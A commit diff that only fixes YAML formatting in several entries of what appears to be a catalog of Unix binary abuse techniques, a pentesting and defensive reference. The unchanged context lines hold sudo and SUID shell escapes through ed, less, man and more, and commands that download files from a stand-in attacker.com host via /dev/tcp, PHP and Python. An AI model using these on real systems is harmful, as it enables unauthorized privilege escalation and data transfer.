Fix YAMLs format

This commit is contained in:
Andrea Cardaci 2018-06-01 00:20:23 +02:00
parent bdf78c5e99
commit b96f6e9a49
11 changed files with 14 additions and 14 deletions

View File

@ -17,8 +17,8 @@ functions:
LFILE=file_to_write LFILE=file_to_write
busybox sh -c 'echo "data" > $LFILE' busybox sh -c 'echo "data" > $LFILE'
upload: upload:
- description: Serve files in the local folder running an HTTP server. - description: Serve files in the local folder running an HTTP server.
code: | code: |
export LPORT=12345 export LPORT=12345
busybox httpd -f -p $LPORT -h . busybox httpd -f -p $LPORT -h .
--- ---

View File

@ -9,7 +9,7 @@ functions:
sudo ed sudo ed
!/bin/sh !/bin/sh
suid-limited: suid-limited:
- code: |- - code: |
./ed ./ed
!/bin/sh !/bin/sh
file-read: file-read:

View File

@ -29,7 +29,7 @@ functions:
3<>/dev/tcp/$RHOST/$RPORT \ 3<>/dev/tcp/$RHOST/$RPORT \
| { while read -r; do [ "$REPLY" = "$(echo -ne "\r")" ] && break; done; cat; } > $LFILE' | { while read -r; do [ "$REPLY" = "$(echo -ne "\r")" ] && break; done; cat; } > $LFILE'
- description: Fetch remote file using a TCP connection. Run `nc -l -p 12345 < "file_to_send"` on the attacker box to send the file. - description: Fetch remote file using a TCP connection. Run `nc -l -p 12345 < "file_to_send"` on the attacker box to send the file.
code: |- code: |
export RHOST=attacker.com export RHOST=attacker.com
export RPORT=12345 export RPORT=12345
export LFILE=file_to_get export LFILE=file_to_get

View File

@ -12,7 +12,7 @@ functions:
sudo less /etc/profile sudo less /etc/profile
!/bin/sh !/bin/sh
suid-limited: suid-limited:
- code: |- - code: |
./less /etc/profile ./less /etc/profile
!/bin/sh !/bin/sh
file-read: file-read:

View File

@ -9,7 +9,7 @@ functions:
sudo mail -f /etc/hosts sudo mail -f /etc/hosts
!/bin/sh !/bin/sh
suid-limited: suid-limited:
- code: |- - code: |
./mail -f /etc/hosts ./mail -f /etc/hosts
!/bin/sh !/bin/sh
--- ---

View File

@ -9,7 +9,7 @@ functions:
sudo man man sudo man man
!/bin/sh !/bin/sh
suid-limited: suid-limited:
- code: |- - code: |
./man man ./man man
!/bin/sh !/bin/sh
file-read: file-read:

View File

@ -9,7 +9,7 @@ functions:
TERM= sudo -E more /etc/profile TERM= sudo -E more /etc/profile
!/bin/sh !/bin/sh
suid-limited: suid-limited:
- code: |- - code: |
TERM= ./more /etc/profile TERM= ./more /etc/profile
!/bin/sh !/bin/sh
file-read: file-read:

View File

@ -20,7 +20,7 @@ functions:
^T ^T
suid-enabled: suid-enabled:
- description: After running this exit the editor to see the command output. - description: After running this exit the editor to see the command output.
code: |- code: |
COMMAND=id COMMAND=id
TF=$(mktemp) TF=$(mktemp)
echo $'#!/bin/sh -p\n'"$COMMAND" > $TF echo $'#!/bin/sh -p\n'"$COMMAND" > $TF

View File

@ -35,7 +35,7 @@ functions:
php -S $LHOST:$LPORT php -S $LHOST:$LPORT
download: download:
- description: Fetch a remote file via HTTP GET request. - description: Fetch a remote file via HTTP GET request.
code: |- code: |
export URL=http://attacker.com/file_to_get export URL=http://attacker.com/file_to_get
export LFILE=where_to_save export LFILE=where_to_save
php -r '$c=file_get_contents(getenv("URL"));file_put_contents(getenv("LFILE"), $c);' php -r '$c=file_get_contents(getenv("URL"));file_put_contents(getenv("LFILE"), $c);'

View File

@ -20,7 +20,7 @@ functions:
^T ^T
suid-enabled: suid-enabled:
- description: After running this exit the editor to see the command output. - description: After running this exit the editor to see the command output.
code: |- code: |
COMMAND=id COMMAND=id
TF=$(mktemp) TF=$(mktemp)
echo $'#!/bin/sh -p\n'"$COMMAND" > $TF echo $'#!/bin/sh -p\n'"$COMMAND" > $TF

View File

@ -18,7 +18,7 @@ functions:
python2 -m SimpleHTTPServer $LPORT python2 -m SimpleHTTPServer $LPORT
download: download:
- description: Fetch a remote file via HTTP GET request. - description: Fetch a remote file via HTTP GET request.
code: |- code: |
export URL=http://attacker.com/file_to_get export URL=http://attacker.com/file_to_get
export LFILE=where_to_save export LFILE=where_to_save
python2 -c 'import urllib as u,os.environ as e;u.urlretrieve(e["URL"], e["LFILE"])' python2 -c 'import urllib as u,os.environ as e;u.urlretrieve(e["URL"], e["LFILE"])'